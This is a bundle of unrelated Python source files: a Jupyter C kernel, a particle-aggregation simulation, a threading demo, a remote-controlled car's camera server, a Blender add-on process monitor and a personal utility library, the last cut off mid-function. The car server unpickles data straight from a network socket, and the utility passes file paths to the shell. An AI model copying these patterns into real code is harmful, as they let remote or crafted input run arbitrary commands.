import os
import os.path as path
class RealTimeSubprocess(subprocess.Popen):
"""
A subprocess that allows to read its stdout and stderr in real time
"""
def __init__(self, cmd, write_to_stdout, write_to_stderr):
"""
:param cmd: the command to execute
:param write_to_stdout: a callable that will be called with chunks of data from stdout
:param write_to_stderr: a callable that will be called with chunks of data from stderr
"""
self._write_to_stdout = write_to_stdout
self._write_to_stderr = write_to_stderr
super().__init__(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)
self._stdout_queue = Queue()
self._stdout_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stdout, self._stdout_queue))
self._stdout_thread.daemon = True
self._stdout_thread.start()
self._stderr_queue = Queue()
self._stderr_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stderr, self._stderr_queue))
self._stderr_thread.daemon = True
self._stderr_thread.start()
@staticmethod
def _enqueue_output(stream, queue):
"""
Add chunks of data from a stream to a queue until the stream is empty.
"""
for line in iter(lambda: stream.read(4096), b''):
queue.put(line)
stream.close()
def wait_for_threads(self):
self._stdout_thread.join()
self._stderr_thread.join()
def write_contents(self):
"""
Write the available content from stdin and stderr where specified when the instance was created
:return:
"""
def read_all_from_queue(queue):
res = b''
size = queue.qsize()
while size != 0:
res += queue.get_nowait()
size -= 1
return res
stdout_contents = read_all_from_queue(self._stdout_queue)
if stdout_contents:
self._write_to_stdout(stdout_contents)
stderr_contents = read_all_from_queue(self._stderr_queue)
if stderr_contents:
self._write_to_stderr(stderr_contents)
class CKernel(Kernel):
implementation = 'jupyter_c_kernel'
implementation_version = '1.0'
language = 'c'
language_version = 'C11'
language_info = {'name': 'c',
'mimetype': 'text/plain',
'file_extension': '.c'}
banner = "C kernel.\n" \
"Uses gcc, compiles in C11, and creates source code files and executables in temporary folder.\n"
def __init__(self, *args, **kwargs):
super(CKernel, self).__init__(*args, **kwargs)
self.files = []
mastertemp = tempfile.mkstemp(suffix='.out')
os.close(mastertemp[0])
self.master_path = mastertemp[1]
filepath = path.join(path.dirname(path.realpath(__file__)), 'resources', 'master.c')
subprocess.call(['gcc', filepath, '-std=c11', '-rdynamic', '-ldl', '-o', self.master_path])
def cleanup_files(self):
"""Remove all the temporary files created by the kernel"""
for file in self.files:
os.remove(file)
os.remove(self.master_path)
def new_temp_file(self, **kwargs):
"""Create a new temp file to be deleted when the kernel shuts down"""
# We don't want the file to be deleted when closed, but only when the kernel stops
kwargs['delete'] = False
kwargs['mode'] = 'w'
file = tempfile.NamedTemporaryFile(**kwargs)
self.files.append(file.name)
return file
def _write_to_stdout(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stdout', 'text': contents})
def _write_to_stderr(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stderr', 'text': contents})
def create_jupyter_subprocess(self, cmd):
return RealTimeSubprocess(cmd,
lambda contents: self._write_to_stdout(contents.decode()),
lambda contents: self._write_to_stderr(contents.decode()))
def compile_with_gcc(self, source_filename, binary_filename, cflags=None, ldflags=None):
cflags = ['-std=c11', '-fPIC', '-shared', '-rdynamic'] + cflags
args = ['gcc', source_filename] + cflags + ['-o', binary_filename] + ldflags
return self.create_jupyter_subprocess(args)
def _filter_magics(self, code):
magics = {'cflags': [],
'ldflags': [],
'args': []}
for line in code.splitlines():
if line.startswith('//%'):
key, value = line[3:].split(":", 2)
key = key.strip().lower()
if key in ['ldflags', 'cflags']:
for flag in value.split():
magics[key] += [flag]
elif key == "args":
# Split arguments respecting quotes
for argument in re.findall(r'(?:[^\s,"]|"(?:\\.|[^"])*")+', value):
magics['args'] += [argument.strip('"')]
return magics
def do_execute(self, code, silent, store_history=True,
user_expressions=None, allow_stdin=False):
magics = self._filter_magics(code)
with self.new_temp_file(suffix='.c') as source_file:
source_file.write(code)
source_file.flush()
with self.new_temp_file(suffix='.out') as binary_file:
p = self.compile_with_gcc(source_file.name, binary_file.name, magics['cflags'], magics['ldflags'])
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0: # Compilation failed
self._write_to_stderr(
"[C kernel] GCC exited with code {}, the executable will not be executed".format(
p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [],
'user_expressions': {}}
p = self.create_jupyter_subprocess([self.master_path, binary_file.name] + magics['args'])
while p.poll() is None:
p.write_contents()
p.wait_for_threads()
p.write_contents()
if p.returncode != 0:
self._write_to_stderr("[C kernel] Executable exited with code {}".format(p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}}
def do_shutdown(self, restart):
"""Cleanup the created source code files and executables when shutting down the kernel"""
self.cleanup_files()
|
simulation.py
|
import logging
import constant
import time
import random
from threading import Thread
from tkinter import *
from enum import Enum
class State(Enum):
'''Simulation states'''
NOT_INITIALIZED = 1
INITIALIZED = 2
STARTED = 3
class Simulation:
'''Simulation of a diffusion limited aggregation.'''
def __init__(self, size):
'''Constructor'''
self.state = State.NOT_INITIALIZED
self.size = size
self.color = 0x773333
self.color_negate = False
self.points = {}
def initialize_simulation(self):
'''Initializes the simulation'''
self.assert_state(State.NOT_INITIALIZED)
logging.debug("Initializing simulation.")
self.initialize_gui()
self.state = State.INITIALIZED
def start_simulation(self):
'''Start simulation'''
self.assert_state(State.INITIALIZED)
logging.debug("Starting simulation.")
self.state = State.STARTED
self.thread = Thread(group=None, target=self.run, name=constant.SHORT_NAME)
self.thread.start()
mainloop()
def stop_simulation(self):
'''Stop simulation'''
self.assert_state(State.STARTED)
logging.debug("Stopping simulation.")
self.state = State.NOT_INITIALIZED
def initialize_gui(self):
logging.debug("Initializing window.")
window = Tk()
window.title(constant.NAME)
canvas = Canvas(window, width=self.size, height=self.size, bg="#000000")
canvas.pack()
self.img = PhotoImage(width=self.size, height=self.size)
canvas.create_image((self.size // 2, self.size // 2), image = self.img, state="normal")
def run(self):
'''Runs the simulation'''
logging.debug("Running simulation.")
self.assert_state(State.STARTED)
self.initialize_points()
self.create_anchor_line()
while self.state == State.STARTED:
#create random x and y from which the random walk starts
x = int(self.size * random.random())
y = self.size - 10
self.random_walk(x, y)
def initialize_points(self):
'''Initializes the points map'''
for x in range(self.size):
for y in range(self.size):
self.points[x, y] = False
def create_anchor_line(self):
'''Creates an anchor of points to which the particles can dock to'''
for x in range(self.size):
self.points[x, 0] = True
self.draw_point(x, 0)
def random_walk(self, x, y):
'''Random walk algorithm to move a particle until it touches another particle'''
while self.is_in_bounds(x, y):
x, y = self.apply_random_step(x, y)
if self.is_touching(x, y):
self.on_touching(x, y)
return # random walk is over because a touching particle exists
def apply_random_step(self, x, y):
'''Randomly increases or decreases x and/or y'''
direction = random.random()
if direction < 0.25:
x -= 1
elif direction < 0.5:
x += 1
elif direction < 0.65:
y += 1
else:
y -= 1
return (x, y)
def is_in_bounds(self, x, y):
'''Whether the given coordinates are in bounds'''
return x < self.size - 2 and x > 1 and y < self.size - 2 and y > 1
def is_touching(self, x, y):
'''Checks whether the given coordinates are touching an existing particle'''
#r = right, l = left, u = up, d = down
r = self.points[x + 1, y]
l = self.points[x - 1, y]
u = self.points[x, y + 1]
d = self.points[x, y - 1]
ru = self.points[x + 1, y + 1]
ld = self.points[x - 1, y - 1]
rd = self.points[x + 1, y - 1]
lu = self.points[x - 1, y + 1]
return r or l or u or d or ru or ld or rd or lu
def on_touching(self, x, y):
'''Touching event handler'''
logging.debug(f"Touch detected at {x}:{y}")
self.points[x, y] = True
self.draw_point(x, y)
if y > self.size - 10:
self.state = State.NOT_INITIALIZED
def draw_point(self, x, y):
'''Draws a point at the specified coordinates'''
self.img.put("#{0:06X}".format(self.color), (x, y))
self.update_color()
def update_color(self):
'''Updates the color'''
if (self.color_negate):
self.color -= 1
if (self.color < 0x773333):
self.color_negate = False
else:
self.color += 1
if (self.color > 0xFFFFFF - 1):
self.color_negate = True
def assert_state(self, state):
'''Asserts if the state if this instance is equal to the provided state.'''
if not isinstance(state, State):
logging.error("Illegal instance type of state")
raise TypeError("Passed state is not an enumeration of type State")
assert self.state == state
|
threds_watcher.py
|
from threading import Thread
import time
a = 0 # global variable
def thread1(threadname):
global a
b = a
print(f'a {a}, b {b}')
for k in range(50):
print(f'a {a}, b {b}')
if b != a:
print(f'changed a {a}, b {b}')
b = a
time.sleep(0.1)
thread1 = Thread(target=thread1, args=("Thread-1",))
try:
thread1.start()
except (KeyboardInterrupt, SystemExit):
cleanup_stop_thread()
sys.exit()
# join blocks all other behavior until threads have finished:
# thread1.join()
for k in range(50):
a += 1
time.sleep(0.2)
if k == 5:
a += 100
|
new_server.py
|
import socket, cv2, pickle,struct,traceback,threading
import time
from Car import Car
from tkinter import *
#GPIO stufffff
car=Car()
# tkinter stufffffff
angle = 1540
quit=False
bnfflag=True
def throttlethread():
def assign_throttle(val):
car.setthrottle(int(val))
def bnffunc():
global bnfflag
if not bnfflag:
car.brake()
bnfflag=not bnfflag
else:
car.forward()
bnfflag=not bnfflag
def quitfunc():
global quit
car.stop()
car.quitfunc()
quit = True
root.destroy()
root = Tk()
root.geometry('600x200')
slider1 = Scale(root, from_=0, to=255, length=400, resolution=1,
orient=HORIZONTAL, command=assign_throttle, variable=angle).pack()
quitme = Button(root, command=quitfunc, text="QUIT",
height=3, width=10).pack(side=LEFT, padx=100)
pauseorresume = Button(root, command=bnffunc, text="pause/resume",
height=3, width=10).pack(side=RIGHT, padx=100)
root.mainloop()
t1 = threading.Thread(target=throttlethread)
t1.start()
#socket Stufffff
server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#host_ip = '192.168.29.55'
host_ip='192.168.43.34'
# host_ip='192.168.43.55'
#host_name = socket.gethostname()
#host_ip = socket.gethostbyname(host_name)
port = 9998
print('HOST IP:',host_ip)
socket_address = (host_ip,port)
server_socket.bind(socket_address)
server_socket.listen(5)
print("LISTENING AT:",socket_address)
client_socket,addr = server_socket.accept()
print('Connection From:',addr)
# Camera Stuffffff
cam=cv2.VideoCapture(0)
while not quit:
try:
if not cam.isOpened():
print("camera errror")
break
res,frame=cam.read()
if not res:
print("problem reading camera")
break
frame=cv2.resize(frame,(320,320))
# cv2.imshow("frame",frame)
# if cv2.waitKey(1) & 0xff ==27 : break
pframe=pickle.dumps(frame)
msg=struct.pack("Q",len(pframe))+pframe
client_socket.sendall(msg)
#msg_size = struct.unpack("Q",msg)[0]
#print(msg_size)
msg=client_socket.recv(100)
rcvmsg=pickle.loads(msg)
print("mesage recvd : ",rcvmsg )
car.steer(int(rcvmsg))
except:
car.stop()
print("something went wrong ")
traceback.print_exc()
client_socket.close()
break
|
bg_blender.py
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
if "bpy" in locals():
from importlib import reload
utils = reload(utils)
else:
from blenderkit import utils
import bpy
import sys, threading, os
import re
from bpy.props import (
EnumProperty,
)
bg_processes = []
class threadCom: # object passed to threads to read background process stdout info
''' Object to pass data between thread and '''
def __init__(self, eval_path_computing, eval_path_state, eval_path, process_type, proc, location=None, name=''):
# self.obname=ob.name
self.name = name
self.eval_path_computing = eval_path_computing # property that gets written to.
self.eval_path_state = eval_path_state # property that gets written to.
self.eval_path = eval_path # property that gets written to.
self.process_type = process_type
self.outtext = ''
self.proc = proc
self.lasttext = ''
self.message = '' # the message to be sent.
self.progress = 0.0
self.location = location
self.error = False
self.log = ''
def threadread(tcom):
'''reads stdout of background process, done this way to have it non-blocking. this threads basically waits for a stdout line to come in, fills the data, dies.'''
found = False
while not found:
inline = tcom.proc.stdout.readline()
# print('readthread', time.time())
inline = str(inline)
s = inline.find('progress{')
if s > -1:
e = inline.find('}')
tcom.outtext = inline[s + 9:e]
found = True
if tcom.outtext.find('%') > -1:
tcom.progress = float(re.findall('\d+\.\d+|\d+', tcom.outtext)[0])
return
if s == -1:
s = inline.find('Remaining')
if s > -1:
# e=inline.find('}')
tcom.outtext = inline[s: s + 18]
found = True
return
if len(inline) > 3:
print(inline, len(inline))
# if inline.find('Error'):
# tcom.error = True
# tcom.outtext = inline[2:]
def progress(text, n=None):
'''function for reporting during the script, works for background operations in the header.'''
# for i in range(n+1):
# sys.stdout.flush()
text = str(text)
if n is None:
n = ''
else:
n = ' ' + ' ' + str(int(n * 1000) / 1000) + '% '
spaces = ' ' * (len(text) + 55)
sys.stdout.write('progress{%s%s}\n' % (text, n))
sys.stdout.flush()
@bpy.app.handlers.persistent
def bg_update():
'''monitoring of background process'''
text = ''
s = bpy.context.scene
global bg_processes
if len(bg_processes) == 0:
return 2
for p in bg_processes:
# proc=p[1].proc
readthread = p[0]
tcom = p[1]
if not readthread.is_alive():
readthread.join()
# readthread.
if tcom.error:
estring = tcom.eval_path_computing + ' = False'
exec(estring)
tcom.lasttext = tcom.outtext
if tcom.outtext != '':
tcom.outtext = ''
estring = tcom.eval_path_state + ' = tcom.lasttext'
exec(estring)
# print(tcom.lasttext)
if 'finished successfully' in tcom.lasttext:
bg_processes.remove(p)
estring = tcom.eval_path_computing + ' = False'
exec(estring)
else:
readthread = threading.Thread(target=threadread, args=([tcom]), daemon=True)
readthread.start()
p[0] = readthread
if len(bg_processes) == 0:
bpy.app.timers.unregister(bg_update)
return .1
process_types = (
('UPLOAD', 'Upload', ''),
('THUMBNAILER', 'Thumbnailer', ''),
)
process_sources = (
('MODEL', 'Model', 'set of objects'),
('SCENE', 'Scene', 'set of scenes'),
('MATERIAL', 'Material', 'any .blend Material'),
('TEXTURE', 'Texture', 'a texture, or texture set'),
('BRUSH', 'Brush', 'brush, can be any type of blender brush'),
)
class KillBgProcess(bpy.types.Operator):
'''Remove processes in background.'''
bl_idname = "object.kill_bg_process"
bl_label = "Kill Background Process"
bl_options = {'REGISTER'}
process_type: EnumProperty(
name="Type",
items=process_types,
description="Type of process",
default="UPLOAD",
)
process_source: EnumProperty(
name="Source",
items=process_sources,
description="Source of process",
default="MODEL",
)
def execute(self, context):
s = bpy.context.scene
cls = bpy.ops.object.convert.__class__
# first do the easy stuff...TODO all cases.
props = utils.get_upload_props()
if self.process_type == 'UPLOAD':
props.uploading = False
if self.process_type == 'THUMBNAILER':
props.is_generating_thumbnail = False
global blenderkit_bg_process
# print('killing', self.process_source, self.process_type)
# then go kill the process. this wasn't working for unsetting props and that was the reason for changing to the method above.
processes = bg_processes
for p in processes:
tcom = p[1]
# print(tcom.process_type, self.process_type)
if tcom.process_type == self.process_type:
source = eval(tcom.eval_path)
print(source.bl_rna.name, self.process_source)
print(source.name)
kill = False
if source.bl_rna.name == 'Object' and self.process_source == 'MODEL':
if source.name == bpy.context.active_object.name:
kill = True
if source.bl_rna.name == 'Material' and self.process_source == 'MATERIAL':
if source.name == bpy.context.active_object.active_material.name:
kill = True
if source.bl_rna.name == 'Brush' and self.process_source == 'BRUSH':
brush = utils.get_active_brush()
if brush is not None and source.name == brush.name:
kill = True
if kill:
estring = tcom.eval_path_computing + ' = False'
exec(estring)
processes.remove(p)
tcom.proc.kill()
return {'FINISHED'}
def add_bg_process(location=None, name=None, eval_path_computing='', eval_path_state='', eval_path='', process_type='',
process=None):
'''adds process for monitoring'''
global bg_processes
tcom = threadCom(eval_path_computing, eval_path_state, eval_path, process_type, process, location, name)
readthread = threading.Thread(target=threadread, args=([tcom]), daemon=True)
readthread.start()
bg_processes.append([readthread, tcom])
if not bpy.app.timers.is_registered(bg_update):
bpy.app.timers.register(bg_update, persistent=True)
def stert_bg_blender():
pass;
def register():
bpy.utils.register_class(KillBgProcess)
def unregister():
bpy.utils.unregister_class(KillBgProcess)
|
__init__.py
|
'''
This Module is One to Make Your Code Shorter.
High API Will Make You Feel You're Ordering And Machine Is Doing!
Also There is Collection of most usefull function and methods from popular modules of python.
(Read Help of Functions)
Official Documention Will Be Added Soon.
'''
'''
Written By RX
Last Update: 1-15-2021
'''
__version__ = '3.0.0'
"""
< Release Changes >
- style.log_ now have all time prefix by default
- call=call_later
- system.mac_address
- io.selective_input choices can be dict
- Class Internet
- class date_time
"""
'''
TODO:
- average()
DATETIME:
X calendar_month_st replace day will be all noms
- Passed Time func
- System.(copy_to_clipboard & paste_from_clipboard)
- Other archive files in extract
- Call_later **kwargs
- Internet:
default_timeout
- files:
- files.join files.dirname
- Error in files.MEMBERS.all_all_*
- socket.socket()
- Screen recorder
- Make Sound
- mp3 tags (v 3.x)
- registery editor (v 3.x)
- re module (v 3.x)
- Developer:
reload_module
Check_Type
add_module_dir
- Create Local Server
- ( win32api.LoadLibrary() - ctypes.PyDLL() )
X Threading
- Ready-obj module
- !style defaults
- Check 3rd-party modules imports
- pip install update
- Open Video
- Open Audio
'''
#START
import os as _os
import re as _re
import sys as _sys
import abc as _abc
import time as _time
import socket as _socket
import typing as _typing
import urllib as _urllib
import shutil as _shutil
import random as _random
import datetime as _datetime
import calendar as _calendar
import requests as _requests
import subprocess as _subprocess
from bs4 import BeautifulSoup
from typing import (Any,Iterable,Optional,Callable,List,Union)
import psutil as _psutil
argv = _sys.argv
ABC = _abc.ABC
ABCMeta = _abc.ABCMeta
####### 8888888888 888 d8b #######
#### 888 888 Y8P ####
#### 888 888 ####
#### 8888888 888 888 88888b. .d8888b 888888 888 .d88b. 88888b. .d8888b ####
#### 888 888 888 888 "88b d88P" 888 888 d88""88b 888 "88b 88K ####
#### 888 888 888 888 888 888 888 888 888 888 888 888 "Y8888b. ####
#### 888 Y88b 888 888 888 Y88b. Y88b. 888 Y88..88P 888 888 X88 ####
####### 888 "Y88888 888 888 "Y8888P "Y888 888 "Y88P" 888 888 88888P' #######
def p(text='', end='\n'):
'''
p is print!
But because we use it a lot, we\'ve decided to make it one letter.
Example:
p('Hello World')
==>Hello World
'''
print(text, end=end)
def repeat(function, n: int, **kwargs):
'''
Repeat function for n times with given parameters
for more info see the example below.
Example:
re(rx.screenshot, 3, image_name='screenshot.png')
==> "function rx.screenshot will be executed 3 times."
'''
for _ in range(n):
function(**kwargs)
def wait(seconds):
'''
Use this if you want your program wait for a certain _time.
Parameters
----------
seconds : [int/float]
time to sleep program in seconds
'''
_time.sleep(seconds)
sleep = wait
def cls():
'''
You can use this function if you want to clear the environment.
'''
import platform
if platform.system() == "Windows":
_os.system('cls')
else:
_os.system('clear')
clear = cls
def progressbar(
total=100, dashes_nom=100, delay=1, dashes_shape=' ', complete_shape='█',
pre_text='Loading: ', left_port='|', right_port='|'):
'''
Use this function to make a custom in-app progress bar (Not Very Usefull).
(Use Progressbar() Generator instead to do your stuffs while updating progressbar)
Example:
progressbar(
Total=100,Dashes_Nom=10,Time=1,Dashes_Shape='-',
Complete_Shape='#', Pre_Text='Loading')
==> Loading|####------| 40/100
'''
def Progressbar(it, prefix="", size=60, file=_sys.stdout):
count = len(it)
def show(j):
x = int(size*j/count)
file.write(f"{prefix}{right_port}{complete_shape*x}{dashes_shape*(size-x)}{left_port} {j}/{count}\r")
file.flush()
show(0)
for i, item in enumerate(it):
yield item
show(i+1)
file.write("\n")
file.flush()
for _ in Progressbar(range(total), pre_text, dashes_nom):
wait(delay)
def wait_for(button:str):
"""
If You Want to Wait For the User to Press a Key (Keyboard/Mouse)
Use This Function.
Parameters
----------
button : str
Button to click
Raises
------
ValueError
It will be raised when invalid button is given
"""
button = button.lower()
if button.lower() in ('middle', 'left', 'right', 'back', 'forward'):
if button == 'back':
button = 'x'
if button == 'forward':
button = 'x2'
import mouse
mouse.wait(button)
else:
import keyboard
try:
keyboard.wait(button)
except:
raise ValueError('Incorrect Button Name.')
def call_later(function:Callable, *args, delay=0.001):
"""
Call Your Function Later Even Between Other Operations
(This function uses threading module so be careful about
how, when, and on what object you are going to operate on)
Parameters
----------
function : Callable
this should be your function name
delay : float,int
delay before calling function in seconds, by default 0.001
"""
import threading
thread = threading.Thread(target=lambda: (sleep(delay), function(*args)))
thread.start()
#keyboard.call_later(function, args, delay)
call = call_later
def convert_bytes(num:int) -> str:
"""
Convert num to idiomatic byte unit.
Parameters
----------
num : int
number you want to convert (in Byte)
Returns
-------
str
number + unit
Examples
--------
>>> convert_bytes(200)
'200.0 bytes'
>>> convert_bytes(6000)
'5.9 KB'
>>> convert_bytes(80000)
'78.1 KB'
"""
'''
'''
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.0:
return "%3.1f %s" % (num, x)
num /= 1024.0
def restart_app(python3:bool = False):
"""
This Function Close App and Recall it From Terminal
(It uses terminal.run to run command 'python[3] *argv')
Parameters
----------
python3 : bool, optional
use 'python' or 'python3', by default False
"""
_os.execv(_sys.executable, ['python3' if python3 else 'python'] + _sys.argv)
_sys.exit()
def active_window_title() -> str:
"""
Get active windows title
(Usually terminal is active window title
but if during executing your script you change window
this will return new window title)
Returns
-------
str
string of active window title
"""
import pyautogui
return pyautogui.getActiveWindowTitle()
def open_image(path:str) -> None:
"""
Open image file with default image viewer.
(Mac OS is not supported yet)
Parameters
----------
path : str
path to the image file
Raises
------
OSError
It will be raised when you run this function in not supported OS
"""
import platform
if platform.system() == 'Windows':
_os.system(path)
elif platform.system() == 'Linux':
_subprocess.getoutput(f'xdg-open {path}')
else:
raise OSError('Only Windows and Linux are supported for this function.')
_BASENAME=''
def download(url:str, filename:str=_BASENAME, save_memory:bool=True,
progressbar:bool =True, prefix:str='Downloading'):
'''
Use this function to download files.
if filename is not given, it will be last part of the url.
filename can be path for saving file.
save_memory parameter is used to save memory in large files
(save directly to storage)
'''
import requests, urllib
if not filename:
filename = url.split('/')[-1]
if save_memory:
'''
with _urllib.request.urlopen(url) as response, open(filename, 'wb') as f:
_shutil.copyfileobj(response, f)
'''
'''
r = _requests.get(url, stream = True)
with open(filename,"wb") as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
'''
if progressbar:
with open(filename, "wb") as f:
response = _requests.get(url, stream=True)
total_length = response.headers.get('content-length')
if total_length is None:
f.write(response.content)
else:
dl = 0
done = 0
total_length = int(total_length)
for data in response.iter_content(chunk_size=4096):
dl += len(data)
f.write(data)
done = int(33 * dl / total_length)
_sys.stdout.write(f"\r{prefix} {filename}: |{'█' * done}{' ' * (33-done)}| {100-((33-done)*3)}%")
_sys.stdout.flush()
if 100-((33-done)*3) == 96:
_sys.stdout.write(f"\r{prefix} {filename}: |{'█' * done}{' ' * (33-done)}| 100%")
_sys.stdout.flush()
else:
with open(filename, "wb") as f:
response = _requests.get(url, stream=True)
for data in response.iter_content(chunk_size=4096):
f.write(data)
else:
def report(blocknr, blocksize, size):
if progressbar:
current = blocknr*blocksize
_sys.stdout.write("\rDownloading {1}: {0:.2f}%".format(100.0*current/size,filename))
def downloadFile(url):
_urllib.request.urlretrieve(url, filename, report)
downloadFile(url)
pass
if progressbar: print()
def extract(filename:str, path:Optional[str]=None,files:Optional[Iterable[str]]=None,
password:Optional[str]=None) -> None:
"""
Extract Files from Zip files
By default it extracts all files
Parameters
----------
filename : str
path to .zip file
path : str, optional
path to extract files (by default: folder in current working directory)
files : Iterable[str], optional
Iterable of files you want to extract, by default None
password : str, optional
password if your .zip file is password protected, by default None
"""
import zipfile
zipfile.ZipFile(filename, 'r').extractall(path=path,members= files,pwd=password)
def screenshot(image_name:str='Screenshot.png'):
'''
This function will take a screenshot and save it as image_name
'''
import pyscreeze
return pyscreeze.screenshot(image_name)
def func_info(func:Callable):
"""
print some information about 'func'
Parameters
----------
func : Callable
function you want to get its information
"""
help(func) #func.__doc__
print('-'*30)
print('Module ', func.__module__)
print('-'*30)
try:
_code_ = str(func.__code__)
_code_ = _code_[_code_.index(',')+2:-1]
except AttributeError:
_code_ = f'No "file" and "line" information available '
_code_ += f' (I guess "{func}" is a built-in function)'
print(_code_)
def Progressbar(
total=60, dashes_nom=30, dashes_shape=' ', complete_shape='█',
pre_text='Loading: ', left_port='|', right_port='|'):
'''
Make your code more beautiful with progressbars!
this is generator function so use it like this:
>>> for _ in generator(100,10):
do_this()
do_that()
Loading: |████ | 40/100
'''
echo = _sys.stdout
def show(j):
x = int(dashes_nom*j/total)
echo.write(
f"{pre_text}{right_port}{complete_shape*x}{dashes_shape*(dashes_nom-x)}{left_port} {j}/{total}\r")
echo.flush()
show(0)
for i, item in enumerate(range(total)):
yield item
show(i+1)
echo.write("\n")
echo.flush()
_MOUSE_X = 0
_MOUSE_Y = 0
def pixel_color(x=_MOUSE_X, y=_MOUSE_Y) -> tuple:
"""
Function to return color of pixel of screen in tuple of RGB
Parameters
----------
x : int
pixel of column x, by default last x of mouse
y : int
pixel of row y, by default last y of mouse
Returns
-------
tuple
tuple with 3 integers: (RED,GREEN,BLUE)
"""
import pyautogui
if not x:
x = pyautogui.position()[0]
if not y:
y = pyautogui.position()[1]
PIXEL = pyautogui.screenshot(region=(x, y, 1, 1))
COLOR = PIXEL.getcolors()
return COLOR[0][1]
def import_module(path:str):
"""
Import modules from files even if they are not .py
Parameters
----------
path : str
path to file to import it
Returns
-------
ModuleType
return module
"""
import importlib.machinery
import importlib.util
loader = importlib.machinery.SourceFileLoader('MOD', path)
spec = importlib.util.spec_from_loader(loader.name, loader)
mod = importlib.util.module_from_spec(spec)
loader.exec_module(mod)
return mod
######################
# TUPLE FUNC #
######################
def force(tpl: Any, *var: Any) -> tuple:
'''
(TUPLE FUNCTION)
It returns tpl with adding var(s) to it.
'''
return tuple(list(tpl)+[v for v in var])
#force= lambda tpl,*var: tuple(list(tpl)+[v for v in var])
def erase(tpl: tuple, *var: Any) -> tuple:
'''
(TUPLE FUNCTION)
It returns tpl with removing var(s) from it.
'''
#lstv= [v for v in var if v in tpl]
lstt= list(tpl)
for th in [v for v in var if v in tpl]:
lstt.remove(th)
return tuple(lstt)
def replace(tpl: tuple, ind, var: Any) -> tuple:
'''
(TUPLE FUNCTION)
Replace tpl[ind] with var
'''
tpl=list(tpl)
if type(ind) == str:
ind= tpl.index(ind)
tpl[ind]=var
return tuple(tpl)
def insert(tpl: tuple, ind, var: Any) -> tuple:
'''
(TUPLE FUNCTION)
Exactly like tpl[ind]=var in lists but for tuples.
'''
tpl=list(tpl)
if type(ind) == str:
ind= tpl.index(ind)
tpl.insert(ind,var)
return tuple(tpl)
def pop(tuple,index=-1):
'''
(TUPLE FUNCTION)
pop method that is used in lists but for tuples
'''
return tuple(list(tuple).pop(index))
"""
def screen_recorder():
from screen_recorder_sdk import screen_recorder
#screen_recorder.enable_dev_log ()
screen_recorder.disable_log()
pid = 2456
screen_recorder.init_resources(pid)
screen_recorder.start_video_recording ('video1.mp4', 30, 8000000, True)
_time.sleep(10)
print('hello')
for i in range(100):
x= i**3
screen_recorder.stop_video_recording ()
screen_recorder.free_resources()
class Error(Exception):
'''
This module is for creating you own Error and Exception!
Useage:
>>> MyError = Error(name='MyError', msg='An Error occurred')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
MyError: An Error occurred
Also You can raise it directly:
>>> raise Error(name='MyError', msg='An Error occurred')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
MyError: An Error occurred
'''
def __new__(cls, msg, name=''):
Error.__name__ = name
return super(Error, cls).__new__(cls, msg)
def __init__(self, **kwargs):
pass
"""
####### .d8888b. 888 888 #######
#### d88P Y88b 888 888 ####
#### 888 888 888 888 ####
#### 888 888 888 8888b. .d8888b .d8888b .d88b. .d8888b ####
#### 888 888 888 "88b 88K 88K d8P Y8b 88K ####
#### 888 888 888 888 .d888888 "Y8888b. "Y8888b. 88888888 "Y8888b. ####
#### Y88b d88P 888 888 888 888 X88 X88 Y8b. X88 ####
####### "Y8888P" 888 888 "Y888888 88888P' 88888P' "Y8888 88888P' #######
class Random:
'''
random Variable Generator Class.
(ALL FUNCTIONS ARE STATIC METHODS)
'''
@staticmethod
def choose(iterator,k: int =1,duplicate=True):
'''
Return a random element from a non-empty sequence.
'''
if type(k) != int:
raise TypeError('k must be integer.')
if k == 1:
return _random.choice(iterator)
elif k > 1:
if duplicate:
return _random.choices(iterator,k=k)
else:
return _random.sample(iterator,k=k)
else:
raise ValueError('k Must Be Higher 0')
@staticmethod
def integer(first_number,last_number):
'''
Return random integer in range [a, b], including both end points.
'''
return _random.randint(first_number,last_number)
@staticmethod
def O1(decimal_number=17):
'''
return x in the interval [0, 1)
'''
return round(_random.random(),decimal_number)
@staticmethod
def number(first_number,last_number):
'''
return x in the interval [F, L]
'''
return _random.uniform(first_number,last_number)
@staticmethod
def shuffle(iterable):
'''
Return shuffled version of iterable
'''
real_type = type(iterable)
new_iterable = list(iterable)
_random.shuffle(new_iterable)
if real_type in (set,tuple):
return real_type(new_iterable)
elif real_type == str:
return ''.join(new_iterable)
elif real_type == dict:
return {item:iterable[item] for item in new_iterable}
else:
return new_iterable
random = Random
class Files:
'''
(STATIC METHODS)\n
Actions and information about files.\n
(READ FUNCTIONS DOCSTRING)
GET INFORMATION:
- exists()
- size()
- abspath()
- mdftime()
- acstime()
- content (read function)()
- is file()
- is dir()
- is readonly()
- is hidden()
ACTIONS:
- remove()
- rename()
- move()
- copy()
- hide()
- read only()
- write()
'''
@staticmethod
def size(path):
'''
return size of the file in byte(s).
Also work on directories.
'''
return _os.path.getsize(path)
#rooye pooshe emtehan she
@staticmethod
def remove(path,force=False):
'''
Use this to delete a file or a directory.
If force is True it will delete non-empty directories.
'''
if _os.path.isfile(path):
_os.remove(path)
else:
if force:
_shutil.rmtree(path)
else:
try:
_os.rmdir(path)
except OSError:
